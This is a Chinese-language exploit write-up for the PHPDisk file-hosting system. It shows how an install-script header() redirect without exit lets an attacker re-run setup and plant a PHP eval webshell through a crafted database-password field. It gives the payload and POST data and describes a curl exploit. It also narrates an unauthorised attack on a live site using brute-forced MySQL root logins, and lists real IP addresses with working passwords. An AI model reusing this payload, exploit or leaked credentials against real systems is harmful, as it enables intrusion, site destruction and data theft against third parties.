phpdisk 漏洞发布 phpdisk header bypass & getShell exp解析

Author:Yaseng Team:CodePlay1:代码审计PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的东东…..图一图一为install下面的index.php,程序安装文件。看上起很正常的代码,当系统安装时,生成一个锁定文件,再次执行install时判断,这里他用了一个Header,而木有exit 。然而php中header 跳转之后代码还是向后执行,可以直接post 数据过去,再来看这个文件 。图二安装流程全部靠$step,而step 又可以靠POST 控制。 继续找可以利用之处

哈哈,为了安装方便,竟然去掉了gpc,这下可以直接写入木马了。2:漏洞利用& getShell 方法查找写入配置的地方

验证是否可以连接,错误的数据库信息直接退出哦了,看来不能乱写了,只能在dbpasswd 上面下功夫。首先yy一下system 下的configs.inc.php 文件\’dbpasswd\’ => \’\’,);?><?php eval($_POST[\’y\’]);?>\’,就可以直接 菜刀连接之由于没有万恶的gpc 直接POST一个\’dbpasswd\’ = \’\’,);?><?php eval($_POST[\’y\’]);?>\’也就是此时的密码为: \’,);?><?php eval($_POST[\’y\’]);?>此时需要post的 数据包为:$pass=\’\\\’,);?><?php eval($_POST[\\\’y\\\’]);?>\’;$data="step=5&dbhost=localhost&dbuser=yaseng&dbname=yaseng&dbpasswd=".$pass;当数据库信息正确时,成功写入一句话木马.图四成功写入shell3:getShell exp 编写结束yy,我们来用php 中强大的curl exp,前文我们已然构造出post 传送的数据。然后在根据特征检测是否getShell ,具体代码如下(完整exp 见附件)。

4:实战演示其实这种拿shell 方式是极其缺德,破坏configs.inc.php,导致全站崩溃,俺找了个比较新的站点(目测没什么人) 主啊 原谅我吧 …… 实战一番. 找外连数据库啊.菜刀里面找了x个shell 皆不能外联,干 向朋友要了个mysql root 爆破工具,爆破了一批root 。 进入数据库成功… 98.126.4.252 root password 进入数据库成功… 98.126.4.253 root password 进入数据库成功… 98.126.4.250 root password 进入数据库成功… 98.126.4.251 root passwd 进入数据库成功… 98.126.4.254 root password 进入数据库成功… 98.126.4.252 root root123456 进入数据库成功… 98.126.4.253 root root123456随便找了个,本地adminer(一个单文件php MySQL管理客户端) 进去改密码，此时发送的data为(如果不行 请大家自行更换可外链的mysql)$pass=\’\\\’,);?><?php eval($_POST[\\\’y\\\’]);?>\’;$data="step=5&dbhost=98.126.4.252&dbuser=root&dbname=mysql&dbpasswd=".$pass;Php命令行下执行php phpdisk.phpDone,成功写入,菜刀连接。Ko ！！！4:总结本文是Header直接跳转导致绕过的典型文章,php函数使用强大而简单,同时我们不得不谨慎使用如header,preg_replace,eval 之类的危险函数,以免被非法利用。